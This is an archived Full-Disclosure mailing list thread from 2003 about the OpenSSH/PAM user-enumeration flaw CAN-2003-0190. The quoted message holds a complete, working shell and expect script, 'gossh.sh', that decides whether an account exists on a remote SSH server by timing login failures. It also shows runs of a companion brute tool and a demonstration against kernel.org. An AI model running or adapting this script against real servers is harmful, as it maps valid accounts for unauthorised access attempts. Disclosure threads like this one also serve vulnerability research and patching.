| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <3EB2759A.5050903@mediaservice.net>
From: maurizio at mediaservice.net (Agazzini Maurizio)
Subject: CAN-2003-0190 - OpenSSH <= 3.6.1p1
Hi,
our little tool works with a modified version of OpenSSH, you can find
the patch at:
http://lab.mediaservice.net/code/openssh-3.6.1p1_brute.diff
You need to put the patched version of the OpenSSH client in to the
working directory, or modify the "#define" in the source code.
--
+-------------------------------------------------------------------+
| Agazzini Maurizio Tel: +39-011-32.72.100 |
| Security Analyst Fax: +39-011-32.46.497 |
| @ Mediaservice.net S.R.L. D.S.D. Data Security Division |
| |
| PGP Key : http://www.wayreth.eu.org/Agazzini_Maurizio.asc |
| Disclaimer: http://@...iaservice.net/disclaimer |
+-------------------------------------------------------------------+
Nicolas Couture wrote:
> After my
>
> --- experience ---
> bash-2.05a$ ./a.out
>
> SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
> Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
>
> Usage: ./a.out <protocol version> <user file> <host>
>
> bash-2.05a$ echo root > file
> bash-2.05a$ ./a.out 2 file 0
>
> SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
> Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
>
> Testing an illegal user : sh: ./ssh: No such file or directory
> sh: ./ssh: No such file or directory
> sh: ./ssh: No such file or directory
> 127 second(s)
>
> Testing login root : sh: ./ssh: No such file or directory
> ILLEGAL [127 second(s)]
>
> bash-2.05a$ cp `which ssh` .
> bash-2.05a$ ./a.out 2 file 0
>
> SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
> Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
>
> Testing an illegal user : not_val_user@0's password: # here I
> had to type enter manually (????)
> Permission denied, please try again.
> not_val_user@0's password: # and so here as well as all other password
> prompts
> Permission denied, please try again.
> not_val_user@0's password:
> Permission denied (publickey,password,keyboard-interactive).
> not_val_user@0's password:
> Permission denied, please try again.
> not_val_user@0's password:
> Permission denied, please try again.
> not_val_user@0's password:
> Permission denied (publickey,password,keyboard-interactive).
> not_val_user@0's password:
> Permission denied, please try again.
> not_val_user@0's password:
> Permission denied, please try again.
> not_val_user@0's password:
> Permission denied (publickey,password,keyboard-interactive).
> 255 second(s)
>
> Testing login root : root@0's password:
> Permission denied, please try again.
> root@0's password:
> Permission denied, please try again.
> root@0's password:
> Permission denied (publickey,password,keyboard-interactive).
> ILLEGAL [255 second(s)]
>
> bash-2.05a$
> --- experience ---
>
> with ssh_brute.c from mediaservice.net who released, lately, an advisory
> for OpenSSH <= 3.6.1p1 that became CAN-2003-0190
> (http://lab.mediaservice.net/advisory/2003-01-openssh.txt) I decided to
> write my own working exploit:
>
> --- gossh.sh ---
> #!/bin/sh
> # OpenSSH <= 3.6.p1 - User Identification.
> # Nicolas Couture - nc@...rmvault.net
> #
> # Description:
> # -Tells you wether or not a user exist on
> # a distant server running OpenSSH.
> #
> # Usage:
> # -You NEED to have the host's public key
> # before executing this script.
> #
>
>
> #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
> # Fact Sheet: #
> # o It is really accurate against #
> # redhat boxes. #
> # o Linux boxes running grsecurity #
> # has 10 seconds delay on both #
> # valid AND invalid user login #
> # attempts. #
> # o *BSD boxes are not vulnerables and #
> # always has 10 seconds delay like #
> # Linux-Grsec + network protection #
> # #
> #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
>
> #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
> # History: #
> # Thu May 1 15:41:18 EDT 2003 #
> # ; Script started. #
> # Thu May 1 16:42:30 EDT 2003 #
> # ; Script is functional. #
> #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
>
> # Let the user know how we work.
> usage(){
> echo "$0 <user> <host>"
> exit 1
> }
>
> # Verify the arguments.
> [ $# != 2 ] && usage
>
> # Variables.
> USER="$1"
> HOST="$2"
>
> #=-=-=-=-=-=-=-=-=-=-=-=-=#
> # Expect script functions #
> #=-=-=-=-=-=-=-=-=-=-=-=-=#
>
> # Expect script for password.
> expasswd() {
> cat << EOF > expasswd
> spawn $SSHCMD
> expect password:
> send '\r'
> interact
> EOF
> }
>
> # Expect script for error.
> experror() {
> cat << EOF > experror
> spawn expect -f expasswd
> expect again.
> exit 1593
> interact
> EOF
> }
>
> #=-=-=-=-=-=-=-=-=-=#
> # -Fake user timing #
> #=-=-=-=-=-=-=-=-=-=#
>
> # OpenSSH client command for inexisting user.
> export SSHCMD="ssh nicolas_couture@...ST"
>
> # Build new expect script.
> expasswd
> experror
>
> # Timing.
> FDATE0=`date '+%s'`
> echo "[-] Calculating fake user timeout..."
> expect -f experror 1> /dev/null 2> /dev/null
> FDATE1=`date '+%s'`
>
> # Fake user timeout.
> FUTO=`echo $FDATE1 - $FDATE0 | bc`
> echo "[+] Found $FUTO."
>
> #=-=-=-=-=-=-=-=#
> # -$USER timing #
> #=-=-=-=-=-=-=-=#
>
> # OpenSSH command.
> export SSHCMD="ssh $USER@...ST"
>
> # Build new expect scripts.
> expasswd
> experror
>
> DATE0=`date '+%s'`
> echo "[-] Calculating $USER timeout on $SERVER..."
> expect -f experror 1> /dev/null 2> /dev/null
> DATE1=`date '+%s'`
>
> # $USER timeout.
> END=`echo $DATE1 - $DATE0 | bc`
> echo "[+] Found $END."
>
> #=-=-=-=-=#
> # -Result #
> #=-=-=-=-=#
>
> if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
> echo "This box is not vulnerable."
> exit 1
> fi
>
> # Use of our magic skills.
> if [ "$FUTO" -lt "$END" ]; then
> echo "$USER exist on $HOST."
> elif [ "$FUTO" -ge "$END" ]; then
> echo "$USER doesn't exist on $HOST."
> else
> echo "Segmentation fault."
> exit 13
> fi
>
> # Remove tmp files.
> rm -rf expasswd experror
>
> # EOF
> --- gossh.sh ---
>
> Interesting things you can find with this script...
>
> --- snip ---
> bash-2.05a$ ./gossh.sh linux kernel.org
> [-] Calculating fake user timeout...
> [+] Found 1.
> [-] Calculating linux timeout on kernel.org...
> [+] Found 1.
> linux doesn't exist on kernel.org.
> bash-2.05a$ finger linux@...nel.org
> The latest stable version of the Linux kernel is: 2.4.20
> The latest prepatch for the stable Linux kernel tree is: 2.4.21-rc1
> The latest beta version of the Linux kernel is: 2.5.68
> The latest snapshot for the beta Linux kernel tree is: 2.5.68-bk11
> The latest 2.2 version of the Linux kernel is: 2.2.25
> The latest 2.0 version of the Linux kernel is: 2.0.39
> The latest prepatch for the 2.0 Linux kernel tree is: 2.0.40-rc6
> The latest -ac patch to the stable Linux kernels is:
> 2.4.21-rc1-ac3
> The latest -ac patch to the beta Linux kernels is: 2.5.67-ac2
> The latest -dj patch to the beta Linux kernels is: 2.5.60-dj2
> --- snip ---
>
> This is a sign that the finger daemon has been hacked by some kernel.org
> people :)
>
>
> Links:
> -http://lab.mediaservice.net/advisory/2003-01-openssh.txt
> -http://lab.mediaservice.net/code/ssh_brute.c
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
Powered by blists - more mailing lists